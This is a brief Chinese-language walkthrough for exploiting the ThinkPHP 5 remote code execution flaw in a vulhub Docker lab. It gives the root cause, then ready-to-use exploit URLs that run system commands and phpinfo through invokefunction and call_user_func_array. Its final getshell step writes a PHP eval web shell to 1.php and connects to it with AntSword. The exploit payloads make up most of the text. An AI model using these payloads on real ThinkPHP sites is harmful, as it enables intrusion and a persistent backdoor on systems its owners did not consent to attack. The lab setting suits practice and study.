第一步：打开靶场

输入开启命令

cd vulhub/thinkphp/5-rce

docker-compose up -d 

docker-compose ps//查看开启的端口

第二步： 访问网址

第三步：漏洞利用

        漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖，通过覆盖类的核心属性filter导致rce，其攻击点较为多，有些还具有限制条件，另外由于种种部分原因，在利用上会出现一些问题。

远程命令执行

ip:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

远程代码执行

http://ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

getshell

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[jbxz]);?>" >1.php

写一个木马php文件到1.php中

访问1.php——使用蚁剑连接